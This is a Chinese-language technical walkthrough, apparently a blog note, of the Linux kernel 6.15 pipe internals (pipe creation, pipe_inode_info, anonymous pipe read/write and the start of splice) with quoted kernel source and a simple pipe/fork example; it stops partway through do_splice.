# Linux Kernel - analyze pipe > Author: 堇姬 Naup ## pipe 是一種 IPC 的方法 pipe 是用於不同 process 之間通訊的一個東西 可以通過 syscall pipe 來去使用 https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md ![image](https://hackmd.io/_uploads/Hyk7AGu_lx.png) ![image](https://hackmd.io/_uploads/SksQAGd_ge.png) 這兩著最終都會 call 到 `do_pipe2`,不過 pipe2 可以添加 flags ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1051 SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags) { return do_pipe2(fildes, flags); } SYSCALL_DEFINE1(pipe, int __user *, fildes) { return do_pipe2(fildes, 0); } ``` 他會去 call `__do_pipe_flags` 之後將從 `__do_pipe_flags` 分配的 files 跟 fd 綁並再一起作為讀端和寫端 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1029 /* * sys_pipe() is the normal C calling standard for creating * a pipe. It's not the way Unix traditionally does this, though. */ static int do_pipe2(int __user *fildes, int flags) { struct file *files[2]; int fd[2]; int error; error = __do_pipe_flags(fd, files, flags); if (!error) { if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) { fput(files[0]); fput(files[1]); put_unused_fd(fd[0]); put_unused_fd(fd[1]); error = -EFAULT; } else { fd_install(fd[0], files[0]); fd_install(fd[1], files[1]); } } return error; } ``` 他會傳入兩個 file struct 並通過 `create_pipe_file` 來去創建 會建立 pipe 的內部結構(pipe_inode_info)、建立兩個 struct file 並設定它們的 f_op 並且 `get_unused_fd_flags` 來去找尚未使用的 fd 並回傳 之後去將他給 fd 作為讀端寫端 fd `audit_fd_pair` 實際上會 call `__audit_fd_pair` 來去建立 `audit_context` 一對 pair fd ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L976 static int __do_pipe_flags(int *fd, struct file **files, int flags) { int error; int fdw, fdr; if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE)) return -EINVAL; error = create_pipe_files(files, flags); if (error) return error; error = get_unused_fd_flags(flags); if (error < 0) goto err_read_pipe; fdr = error; error = get_unused_fd_flags(flags); if (error < 0) goto err_fdr; fdw = error; audit_fd_pair(fdr, fdw); fd[0] = fdr; fd[1] = fdw; /* pipe groks IOCB_NOWAIT */ files[0]->f_mode |= FMODE_NOWAIT; files[1]->f_mode |= FMODE_NOWAIT; return 0; err_fdr: put_unused_fd(fdr); err_read_pipe: fput(files[0]); fput(files[1]); return error; } ``` `create_pipe_files` 建立了很多東西 首先是 pipe inode 之後去建立 `struct pipe_inode_info` (作為 pipe metadata 描述整個 pipe 狀態) 並關聯 (主要是把 pipe_inode_info 的 pointer 以及 ops 給他,詳細可以看 code,這邊不太重要) 之後去 `alloc_file_pseudo` 建立了一個 write only 的 file 以及之後去 clone 一個 readonly 的 file 兩個都去指向 `inode` (這兩個就是上面說的作為讀端跟寫端的 fd) ```c int fd[2]; pipe(fd); // fd[0] = read end, fd[1] = write end ``` 也是 call pipe 會回傳的 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L925 int create_pipe_files(struct file **res, int flags) { struct inode *inode = get_pipe_inode(); struct file *f; int error; if (!inode) return -ENFILE; if (flags & O_NOTIFICATION_PIPE) { error = watch_queue_init(inode->i_pipe); if (error) { free_pipe_info(inode->i_pipe); iput(inode); return error; } } f = alloc_file_pseudo(inode, pipe_mnt, "", O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)), &pipeanon_fops); if (IS_ERR(f)) { free_pipe_info(inode->i_pipe); iput(inode); return PTR_ERR(f); } f->private_data = inode->i_pipe; f->f_pipe = 0; res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK), &pipeanon_fops); if (IS_ERR(res[0])) { put_pipe_info(inode, inode->i_pipe); fput(f); return PTR_ERR(res[0]); } res[0]->private_data = inode->i_pipe; res[0]->f_pipe = 0; res[1] = f; stream_open(inode, res[0]); stream_open(inode, res[1]); /* * Disable permission and pre-content events, but enable legacy * inotify events for legacy users. */ file_set_fsnotify_mode(res[0], FMODE_NONOTIFY_PERM); file_set_fsnotify_mode(res[1], FMODE_NONOTIFY_PERM); return 0; } ``` `get_pipe_inode` 實現了分配 inode ([struct source](https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/fs.h#L672)) 並初始化 包括 `i_pipe` 指向 `pipe_inode_info` 或是給 fops 並給予 fuid fgid 等 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L885 static struct inode * get_pipe_inode(void) { struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb); struct pipe_inode_info *pipe; if (!inode) goto fail_inode; inode->i_ino = get_next_ino(); pipe = alloc_pipe_info(); if (!pipe) goto fail_iput; inode->i_pipe = pipe; pipe->files = 2; pipe->readers = pipe->writers = 1; inode->i_fop = &pipeanon_fops; /* * Mark the inode dirty from the very beginning, * that way it will never be moved to the dirty * list because "mark_inode_dirty()" will think * that it already _is_ on the dirty list. */ inode->i_state = I_DIRTY; inode->i_mode = S_IFIFO | S_IRUSR | S_IWUSR; inode->i_uid = current_fsuid(); inode->i_gid = current_fsgid(); simple_inode_init_ts(inode); return inode; fail_iput: iput(inode); fail_inode: return NULL; } ``` 最後來看看剛剛說的 `struct pipe_inode_info` 作為描述 pipe 的 metadata 有很多資訊存放在上面 - head: 下一個寫入位置 - tail: 下一個讀取位置 - rd_wait / wr_wait - 當 pipe 為空時,讀端進入 rd_wait 等待 - 當 pipe 為滿時,寫端進入 wr_wait 等待 - max_usage: ring buffer 可使用的最大 buffer 數 - readers / writers: 當前活躍的讀端與寫端數量 - files: 有多少個 struct file 引用這個 pipe(受 ->i_lock 保護) - r_counter / w_counter: 計數器,追蹤端點操作,主要用於判斷狀態變化與喚醒邏輯 - poll_usage: 表示此 pipe 是否用於 epoll(因為 epoll 會造成更頻繁的 wakeup,需要特殊處理) - tmp_page: 暫存釋放掉的 page - bufs: 指向真正的 ring buffer ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L86 /** * struct pipe_inode_info - a linux kernel pipe * @mutex: mutex protecting the whole thing * @rd_wait: reader wait point in case of empty pipe * @wr_wait: writer wait point in case of full pipe * @head: The point of buffer production * @tail: The point of buffer consumption * @head_tail: unsigned long union of @head and @tail * @note_loss: The next read() should insert a data-lost message * @max_usage: The maximum number of slots that may be used in the ring * @ring_size: total number of buffers (should be a power of 2) * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs * @tmp_page: cached released page * @readers: number of current readers of this pipe * @writers: number of current writers of this pipe * @files: number of struct file referring this pipe (protected by ->i_lock) * @r_counter: reader counter * @w_counter: writer counter * @poll_usage: is this pipe used for epoll, which has crazy wakeups? * @fasync_readers: reader side fasync * @fasync_writers: writer side fasync * @bufs: the circular array of pipe buffers * @user: the user who created this pipe * @watch_queue: If this pipe is a watch_queue, this is the stuff for that **/ struct pipe_inode_info { struct mutex mutex; wait_queue_head_t rd_wait, wr_wait; /* This has to match the 'union pipe_index' above */ union { unsigned long head_tail; struct { pipe_index_t head; pipe_index_t tail; }; }; unsigned int max_usage; unsigned int ring_size; unsigned int nr_accounted; unsigned int readers; unsigned int writers; unsigned int files; unsigned int r_counter; unsigned int w_counter; bool poll_usage; #ifdef CONFIG_WATCH_QUEUE bool note_loss; #endif struct page *tmp_page[2]; struct fasync_struct *fasync_readers; struct fasync_struct *fasync_writers; struct pipe_buffer *bufs; struct user_struct *user; #ifdef CONFIG_WATCH_QUEUE struct watch_queue *watch_queue; #endif }; ``` 分配 `pipe_inode_info` 的地方在 `alloc_pipe_info` 他會先分配一個 `pipe_inode_info` 之後去建立 0x10 `pipe_buffer` array 以及將 pipe 資訊都填入到 `pipe_inode_info` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L791 struct pipe_inode_info *alloc_pipe_info(void) { struct pipe_inode_info *pipe; unsigned long pipe_bufs = PIPE_DEF_BUFFERS; // #define PIPE_DEF_BUFFERS 16 struct user_struct *user = get_current_user(); unsigned long user_bufs; // static unsigned int pipe_max_size = 1048576; (0x100000) unsigned int max_size = READ_ONCE(pipe_max_size); \ pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT); if (pipe == NULL) goto out_free_uid; if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE)) pipe_bufs = max_size >> PAGE_SHIFT; user_bufs = account_pipe_buffers(user, 0, pipe_bufs); ... pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT); if (pipe->bufs) { init_waitqueue_head(&pipe->rd_wait); init_waitqueue_head(&pipe->wr_wait); pipe->r_counter = pipe->w_counter = 1; pipe->max_usage = pipe_bufs; pipe->ring_size = pipe_bufs; pipe->nr_accounted = pipe_bufs; pipe->user = user; mutex_init(&pipe->mutex); lock_set_cmp_fn(&pipe->mutex, pipe_lock_cmp_fn, NULL); return pipe; } ... return NULL; } ``` 接下來看一下 `pipe_buffer` pipe_buffer 就是用來存資料的地方,每個 pipe 管理了一些 page 來存想通過 pipe 傳輸的 data ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L17 /** * struct pipe_buffer - a linux kernel pipe buffer * @page: the page containing the data for the pipe buffer * @offset: offset of data inside the @page * @len: length of data inside the @page * @ops: operations associated with this buffer. See @pipe_buf_operations. * @flags: pipe buffer flags. See above. * @private: private data owned by the ops. **/ struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; unsigned long private; }; ``` 最終可以看全圖 ![pipe_all](https://hackmd.io/_uploads/rkGpO4OOle.png) 接下來可以看如何去操作 pipe 可以找到這張 vtable (就是放在 inode 的 `i_fop` 指向的 pipeanon_fops) PS: 一個是給匿名一個是個命名 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1243 const struct file_operations pipefifo_fops = { .open = fifo_open, .read_iter = fifo_pipe_read, .write_iter = fifo_pipe_write, .poll = pipe_poll, .unlocked_ioctl = pipe_ioctl, .release = pipe_release, .fasync = pipe_fasync, .splice_write = iter_file_splice_write, }; static const struct file_operations pipeanon_fops = { .open = fifo_open, .read_iter = anon_pipe_read, .write_iter = anon_pipe_write, .poll = pipe_poll, .unlocked_ioctl = pipe_ioctl, .release = pipe_release, .fasync = pipe_fasync, .splice_write = iter_file_splice_write, }; ``` 可以去對 pipe 做 read write 等操作 這部分因為我是看 6.15 版本的 kernel 他將 pipe ops function 變成這樣 (這部分應該是針對匿名管道效率做出的優化) https://git.sceen.net/linux/linux-stable.git/commit/?id=71ee2fde57c707ac8f221321f3e951288f00f04b - anon_pipe_write: 將 data 寫入到 pipe_buffer 上 - anon_pipe_read: 將 data 從 pipe_buffer 讀出來 - splice: 在兩個檔案描述符之間搬資料時,盡量做到零拷貝 ## anon_pipe_write 當我們從 pipe fd 做寫入 (就是要寫進 pipe_buffer),在匿名管道會 call 到這個 `anon_pipe_write` 當我們去 call `write` 的時候 會去 call ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L744 SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf, size_t, count) { return ksys_write(fd, buf, count); } ``` 之後去 call 到 `ksys_write` 如果 f.file 存在,透過 file_ppos 找到在檔案中的位置,其位置位於 f_pos 欄位,回傳到指標 *ppos ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L725 ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count) { CLASS(fd_pos, f)(fd); // 應該是 fd 轉 struct file ssize_t ret = -EBADF; if (!fd_empty(f)) { loff_t pos, *ppos = file_ppos(fd_file(f)); // 當前的讀寫位置 if (ppos) { pos = *ppos; ppos = &pos; } ret = vfs_write(fd_file(f), buf, count, ppos); if (ret >= 0 && ppos) fd_file(f)->f_pos = pos; } return ret; } #define CLASS(_name, var) \ class_##_name##_t var __cleanup(class_##_name##_destructor) = \ class_##_name##_constructor #define fd_file(f) ((struct file *)((f).word & ~(FDPUT_FPUT|FDPUT_POS_UNLOCK))) static inline bool fd_empty(struct fd f) { return unlikely(!f.word); } /* file_ppos returns &file->f_pos or NULL if file is stream */ static inline loff_t *file_ppos(struct file *file) { return file->f_mode & FMODE_STREAM ? NULL : &file->f_pos; } ``` 之後去 call `vfs_write` VFS 定義了在實體檔案系統上更高一層的介面,讓應用程式得以透過VFS 定義好的介面存取底層資料,不用考慮底層是如何實作 https://students.mimuw.edu.pl/ZSO/Wyklady/08_VFS1/VFS-1.pdf * file: 指向欲寫入的檔案結構 (struct file) * buf: 指向使用者空間的資料緩衝區 * count: 欲寫入的資料長度(bytes) * pos: 指向檔案寫入位置的指標(offset) vfs_write 是 Linux VFS 層統一的寫入介面,包含: * 權限和參數合法性檢查 (檔案) * 位置與大小驗證 * 呼叫檔案系統特定的寫入函式 * 寫入後通知檔案系統事件 * 鎖定及統計管理 是連接 syscall write() 與底層檔案系統實際寫入的函式 這部分其他先不管,他會根據你傳入的 file 的 vtable 去找 write,最後就會 call 到目標 `vfs_write` → `new_sync_write` → `filp->f_op->write_iter(&kiocb, &iter)` → `anon_pipe_write()` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L664 ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos) { ssize_t ret; if (!(file->f_mode & FMODE_WRITE)) return -EBADF; if (!(file->f_mode & FMODE_CAN_WRITE)) return -EINVAL; if (unlikely(!access_ok(buf, count))) return -EFAULT; ret = rw_verify_area(WRITE, file, pos, count); if (ret) return ret; if (count > MAX_RW_COUNT) count = MAX_RW_COUNT; file_start_write(file); if (file->f_op->write) ret = file->f_op->write(file, buf, count, pos); else if (file->f_op->write_iter) ret = new_sync_write(file, buf, count, pos); else ret = -EINVAL; if (ret > 0) { fsnotify_modify(file); add_wchar(current, ret); } inc_syscw(current); file_end_write(file); return ret; } ``` 這部分是在串接 kiocb、iter 等 這邊簡單理解 kiocb 內含檔案、寫入位置、狀態等各種 Linux I/O 相關 iov_iter 告訴 kernel 從哪裡拿資料 ```c static ssize_t new_sync_write(struct file *filp, const char __user *buf, size_t len, loff_t *ppos) { struct kiocb kiocb; struct iov_iter iter; ssize_t ret; init_sync_kiocb(&kiocb, filp); kiocb.ki_pos = (ppos ? *ppos : 0); iov_iter_ubuf(&iter, ITER_SOURCE, (void __user *)buf, len); ret = filp->f_op->write_iter(&kiocb, &iter); BUG_ON(ret == -EIOCBQUEUED); if (ret > 0 && ppos) *ppos = kiocb.ki_pos; return ret; } ``` 接下來進入重點,匿名 pipe 的寫入行為 首先是一些初始化 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L431 static ssize_t anon_pipe_write(struct kiocb *iocb, struct iov_iter *from) { struct file *filp = iocb->ki_filp; struct pipe_inode_info *pipe = filp->private_data; unsigned int head; ssize_t ret = 0; size_t total_len = iov_iter_count(from); ssize_t chars; bool was_empty = false; bool wake_next_writer = false; ``` 這部分在試圖去合併到當前存在的尾部 若當前的 pipe 不是 empty 且小於一個 page 之後檢查是否合併後會大於一個 page 跟那個 pipe_buffer (當前 head - 1) 是否有開啟 `PIPE_BUF_FLAG_CAN_MERGE` 更新 offset 到沒使用到的地方 之後去將東西 copy 到對應 page 上 ```c head = pipe->head; was_empty = pipe_empty(head, pipe->tail); chars = total_len & (PAGE_SIZE-1); if (chars && !was_empty) { struct pipe_buffer *buf = pipe_buf(pipe, head - 1); int offset = buf->offset + buf->len; if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && offset + chars <= PAGE_SIZE) { ret = pipe_buf_confirm(pipe, buf); if (ret) goto out; ret = copy_page_from_iter(buf->page, offset, chars, from); if (unlikely(ret < chars)) { ret = -EFAULT; goto out; } buf->len += ret; if (!iov_iter_count(from)) goto out; } } ``` 這是個主迴圈 首先會先檢查 pipe 一些資訊,以及當前 pipe 有沒有 full 狀態 若可以寫入,就去拿一塊 page 來用 `anon_pipe_get_page` 封裝了有關 alloc page 跟拿 tmp 的邏輯 不過總之你會拿到一塊 page 用來作為 pipe_buffer 存放資料的地方 之後用 copy_page_from_iter() 去 copy copy 完後 前移 head,並將去設置好 pipe_buffer 內容 (包含剛剛寫入的 page) 並設置該 buffer 的 offset 為 0(從 0 開始 copy) buffer len 設置成 copy 的長度 之後去根據 packetized 設置情況,來去設置 flags 代表該 page 後續是否可以被合併 ```c for (;;) { if (!pipe->readers) { send_sig(SIGPIPE, current, 0); if (!ret) ret = -EPIPE; break; } head = pipe->head; if (!pipe_full(head, pipe->tail, pipe->max_usage)) { struct pipe_buffer *buf; struct page *page; int copied; page = anon_pipe_get_page(pipe); if (unlikely(!page)) { if (!ret) ret = -ENOMEM; break; } copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) { anon_pipe_put_page(pipe, page); if (!ret) ret = -EFAULT; break; } pipe->head = head + 1; /* Insert it into the buffer array */ buf = pipe_buf(pipe, head); buf->page = page; buf->ops = &anon_pipe_buf_ops; buf->offset = 0; if (is_packetized(filp)) buf->flags = PIPE_BUF_FLAG_PACKET; else buf->flags = PIPE_BUF_FLAG_CAN_MERGE; buf->len = copied; ret += copied; if (!iov_iter_count(from)) break; continue; } /* Wait for buffer space to become available. */ if ((filp->f_flags & O_NONBLOCK) || (iocb->ki_flags & IOCB_NOWAIT)) { if (!ret) ret = -EAGAIN; break; } if (signal_pending(current)) { if (!ret) ret = -ERESTARTSYS; break; } /* * We're going to release the pipe lock and wait for more * space. We wake up any readers if necessary, and then * after waiting we need to re-check whether the pipe * become empty while we dropped the lock. */ mutex_unlock(&pipe->mutex); if (was_empty) wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN); wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe)); mutex_lock(&pipe->mutex); was_empty = pipe_is_empty(pipe); wake_next_writer = true; } ``` 整體寫入邏輯大概是這樣 這邊想細講一下 `copy_page_from_iter` 他會傳入想 copy 的 page pointer 跟起始 offset,跟想寫進去多少 bytes 以及 iter - page_copy_sane 用來檢查傳入的 offset、bytes 是否合法合理 - 之後去 `kmap_local_page` 來將 page 映射到 kernel virtual address 來去操作他並計算本次從該頁可複製的最大位元組數 - 之後 copy 後去 `kunmap_local` 取消映射 ```c size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { size_t res = 0; if (!page_copy_sane(page, offset, bytes)) return 0; page += offset / PAGE_SIZE; // first subpage offset %= PAGE_SIZE; while (1) { void *kaddr = kmap_local_page(page); size_t n = min(bytes, (size_t)PAGE_SIZE - offset); n = _copy_from_iter(kaddr + offset, n, i); kunmap_local(kaddr); res += n; bytes -= n; if (!bytes || !n) break; offset += n; if (offset == PAGE_SIZE) { page++; offset = 0; } } return res; } EXPORT_SYMBOL(copy_page_from_iter); ``` 使用他大概就像這樣 通過 `pipe` 建立 之後去創建一個子進程 子進程因為 read 堵塞 (沒東西),會去等待 pipe 等到父進程寫入資料到 pipe 之後去讀取 ```c #include <stdio.h> #include <unistd.h> #include <string.h> #include <stdlib.h> int main() { int pipefd[2]; pid_t cpid; char buf[100]; if (pipe(pipefd) == -1) { perror("pipe"); exit(EXIT_FAILURE); } cpid = fork(); if (cpid == -1) { perror("fork"); exit(EXIT_FAILURE); } if (cpid == 0) { close(pipefd[1]); ssize_t n = read(pipefd[0], buf, sizeof(buf) - 1); if (n > 0) { buf[n] = '\0'; printf("Child read from pipe: %s\n", buf); } close(pipefd[0]); exit(EXIT_SUCCESS); } else { close(pipefd[0]); const char *msg = "Hello, pipe!"; write(pipefd[1], msg, strlen(msg)); close(pipefd[1]); wait(NULL); exit(EXIT_SUCCESS); } } ``` ## anon_pipe_read 前面的部分跟 write 很像 通過 syscall 調用到 `ksys_read` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L720 SYSCALL_DEFINE3(read, unsigned int, fd, char __user *, buf, size_t, count) { return ksys_read(fd, buf, count); } ``` 一樣的流程處理 fd 跟 buf 之後 call `vfs_read` ```c ssize_t ksys_read(unsigned int fd, char __user *buf, size_t count) { CLASS(fd_pos, f)(fd); ssize_t ret = -EBADF; if (!fd_empty(f)) { loff_t pos, *ppos = file_ppos(fd_file(f)); if (ppos) { pos = *ppos; ppos = &pos; } ret = vfs_read(fd_file(f), buf, count, ppos); if (ret >= 0 && ppos) fd_file(f)->f_pos = pos; } return ret; } ``` 一樣去做了相當多檢查 並且去 call `new_sync_read` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L550 ssize_t vfs_read(struct file *file, char __user *buf, size_t count, loff_t *pos) { ssize_t ret; if (!(file->f_mode & FMODE_READ)) return -EBADF; if (!(file->f_mode & FMODE_CAN_READ)) return -EINVAL; if (unlikely(!access_ok(buf, count))) return -EFAULT; ret = rw_verify_area(READ, file, pos, count); if (ret) return ret; if (count > MAX_RW_COUNT) count = MAX_RW_COUNT; if (file->f_op->read) ret = file->f_op->read(file, buf, count, pos); else if (file->f_op->read_iter) ret = new_sync_read(file, buf, count, pos); else ret = -EINVAL; if (ret > 0) { fsnotify_access(file); add_rchar(current, ret); } inc_syscr(current); return ret; } ``` 將 kiobc 跟 iter 初始化後 去 call `filp->f_op->read_iter` 根據 vtable 實際上調用到 `anon_pipe_read` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L479 static ssize_t new_sync_read(struct file *filp, char __user *buf, size_t len, loff_t *ppos) { struct kiocb kiocb; struct iov_iter iter; ssize_t ret; init_sync_kiocb(&kiocb, filp); kiocb.ki_pos = (ppos ? *ppos : 0); iov_iter_ubuf(&iter, ITER_DEST, buf, len); ret = filp->f_op->read_iter(&kiocb, &iter); BUG_ON(ret == -EIOCBQUEUED); if (ppos) *ppos = kiocb.ki_pos; return ret; } ``` 一開始初始化了一些變數 * iocb:裡面有目前文件指標(filp) * to:讀資料要寫入的 iov_iter * total_len:本次預計要讀的字節數 * pipe:匿名管道的資料結構 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L270 static ssize_t anon_pipe_read(struct kiocb *iocb, struct iov_iter *to) { size_t total_len = iov_iter_count(to); struct file *filp = iocb->ki_filp; struct pipe_inode_info *pipe = filp->private_data; bool wake_writer = false, wake_next_reader = false; ssize_t ret; /* Null read succeeds. */ if (unlikely(total_len == 0)) return 0; ret = 0; mutex_lock(&pipe->mutex); ``` 之後是主迴圈 - smp_load_acquire 讀取 head,以及讀取 tail (head: 下一個寫入 pipe_buffer 位置、tail: 下一個讀取 pipe_buffer 位置) - CONFIG_WATCH_QUEUE 分支我們先不管 - 檢查 pipe 不等於 empty - 從 tail 讀入要讀取的 page - 之後去 `copy_page_to_iter` copy 到 iter (buf) (若複製少於預期,返回錯誤) - 將 offset 下推更新已經讀取範圍,以及 len 去扣掉 chars - 最後去更新 tail ```c /* * We only wake up writers if the pipe was full when we started reading * and it is no longer full after reading to avoid unnecessary wakeups. * * But when we do wake up writers, we do so using a sync wakeup * (WF_SYNC), because we want them to get going and generate more * data for us. */ for (;;) { /* Read ->head with a barrier vs post_one_notification() */ unsigned int head = smp_load_acquire(&pipe->head); unsigned int tail = pipe->tail; #ifdef CONFIG_WATCH_QUEUE if (pipe->note_loss) { struct watch_notification n; if (total_len < 8) { if (ret == 0) ret = -ENOBUFS; break; } n.type = WATCH_TYPE_META; n.subtype = WATCH_META_LOSS_NOTIFICATION; n.info = watch_sizeof(n); if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) { if (ret == 0) ret = -EFAULT; break; } ret += sizeof(n); total_len -= sizeof(n); pipe->note_loss = false; } #endif if (!pipe_empty(head, tail)) { struct pipe_buffer *buf = pipe_buf(pipe, tail); size_t chars = buf->len; size_t written; int error; if (chars > total_len) { if (buf->flags & PIPE_BUF_FLAG_WHOLE) { if (ret == 0) ret = -ENOBUFS; break; } chars = total_len; } error = pipe_buf_confirm(pipe, buf); if (error) { if (!ret) ret = error; break; } written = copy_page_to_iter(buf->page, buf->offset, chars, to); if (unlikely(written < chars)) { if (!ret) ret = -EFAULT; break; } ret += chars; buf->offset += chars; buf->len -= chars; /* Was it a packet buffer? Clean up and exit */ if (buf->flags & PIPE_BUF_FLAG_PACKET) { total_len = chars; buf->len = 0; } if (!buf->len) { wake_writer |= pipe_full(head, tail, pipe->max_usage); tail = pipe_update_tail(pipe, buf, tail); } total_len -= chars; if (!total_len) break; /* common path: read succeeded */ if (!pipe_empty(head, tail)) /* More to do? */ continue; } if (!pipe->writers) break; if (ret) break; if ((filp->f_flags & O_NONBLOCK) || (iocb->ki_flags & IOCB_NOWAIT)) { ret = -EAGAIN; break; } mutex_unlock(&pipe->mutex); /* * We only get here if we didn't actually read anything. * * But because we didn't read anything, at this point we can * just return directly with -ERESTARTSYS if we're interrupted, * since we've done any required wakeups and there's no need * to mark anything accessed. And we've dropped the lock. */ if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0) return -ERESTARTSYS; wake_next_reader = true; mutex_lock(&pipe->mutex); } ``` 更新 tail 邏輯如下 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L239 static inline unsigned int pipe_update_tail(struct pipe_inode_info *pipe, struct pipe_buffer *buf, unsigned int tail) { pipe_buf_release(pipe, buf); /* * If the pipe has a watch_queue, we need additional protection * by the spinlock because notifications get posted with only * this spinlock, no mutex */ if (pipe_has_watch_queue(pipe)) { spin_lock_irq(&pipe->rd_wait.lock); #ifdef CONFIG_WATCH_QUEUE if (buf->flags & PIPE_BUF_FLAG_LOSS) pipe->note_loss = true; #endif pipe->tail = ++tail; spin_unlock_irq(&pipe->rd_wait.lock); return tail; } /* * Without a watch_queue, we can simply increment the tail * without the spinlock - the mutex is enough. */ pipe->tail = ++tail; return tail; } ``` 以上就是 read pipe 到 buffer 上的 call 法 ## release ## splice 先來看看文檔怎麼用 https://man7.org/linux/man-pages/man2/splice.2.html ```c ssize_t splice(int fd_in, off_t *_Nullable off_in, int fd_out, off_t *_Nullable off_out, size_t size, unsigned int flags); ``` * fd_in:輸入的檔案描述符 * off_in:輸入檔案偏移量指標(可能是 NULL) * fd_out:輸出的檔案描述符 * off_out:輸出檔案偏移量指標(可能是 NULL) * len:要搬運的位元組數 * flags:SPLICE_F_* 選項 splice() 用來在兩個 file descriptor 之間移動資料,不經過 user space 與核心空間 kernel space 的資料複製 效率比 read() + write() 高 它最多會傳輸 size 個位元組,其中至少有一個 fd 必須是 pipe fd_in 與 off_in 規則 * 如果 fd_in 是 pipe → off_in 必須是 NULL * 如果 fd_in 不是 pipe 且 off_in == NULL → 從當前檔案偏移量讀取,並自動更新該檔案偏移量 * 如果 fd_in 不是 pipe 且 off_in != NULL → 從 \*off_in 指定的偏移量讀取,不會影響檔案本身的偏移量,但會更新 \*off_in fd_out / off_out 規則與 fd_in / off_in 的規則類似 flags 直接去看文檔 額外參考: https://www.kernel.org/doc/html/v6.15/filesystems/splice.html 根據上述,共會有四種狀況 - pipe2pipe - pipe2file - file2pipe 以下是 kernel source code 當呼叫 splice 會去掉用到 syscall 做了些 flags len 檢查,然後用 `CLASS` macro 找到 fd 的 file pointer 後 就去 call `__do_splice` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1615 SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in, int, fd_out, loff_t __user *, off_out, size_t, len, unsigned int, flags) { if (unlikely(!len)) return 0; if (unlikely(flags & ~SPLICE_F_ALL)) return -EINVAL; CLASS(fd, in)(fd_in); if (fd_empty(in)) return -EBADF; CLASS(fd, out)(fd_out); if (fd_empty(out)) return -EBADF; return __do_splice(fd_file(in), off_in, fd_file(out), off_out, len, flags); } ``` 首先初始化以下變數 * ipipe / opipe:指向輸入(in)/輸出(out)的 pipe kernel 結構,如果該 fd 不是 pipe,會是 NULL * offset:臨時存放 offset * \__off_in / \__off_out:指向 kernel 中的 offset 變數,如果使用者傳了 offset 參數,就用它們 之後通過 `get_pipe_info` 去讀取看看該 fd 是不是 pipe 讀完後檢查是 pipe 的其 offset 並非 null 之後從 userspace copy offset 最後 call `do_splice` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1396 static ssize_t __do_splice(struct file *in, loff_t __user *off_in, struct file *out, loff_t __user *off_out, size_t len, unsigned int flags) { struct pipe_inode_info *ipipe; struct pipe_inode_info *opipe; loff_t offset, *__off_in = NULL, *__off_out = NULL; ssize_t ret; ipipe = get_pipe_info(in, true); opipe = get_pipe_info(out, true); if (ipipe) { if (off_in) return -ESPIPE; pipe_clear_nowait(in); } if (opipe) { if (off_out) return -ESPIPE; pipe_clear_nowait(out); } if (off_out) { if (copy_from_user(&offset, off_out, sizeof(loff_t))) return -EFAULT; __off_out = &offset; } if (off_in) { if (copy_from_user(&offset, off_in, sizeof(loff_t))) return -EFAULT; __off_in = &offset; } ret = do_splice(in, __off_in, out, __off_out, len, flags); if (ret < 0) return ret; if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t))) return -EFAULT; if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t))) return -EFAULT; return ret; } ``` 首先先檢查 in 是不是可讀,out 是不是可寫 之後去 call get_pipe_info 拿到對應的 `pipe_inode_info` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1299 /* * Determine where to splice to/from. */ ssize_t do_splice(struct file *in, loff_t *off_in, struct file *out, loff_t *off_out, size_t len, unsigned int 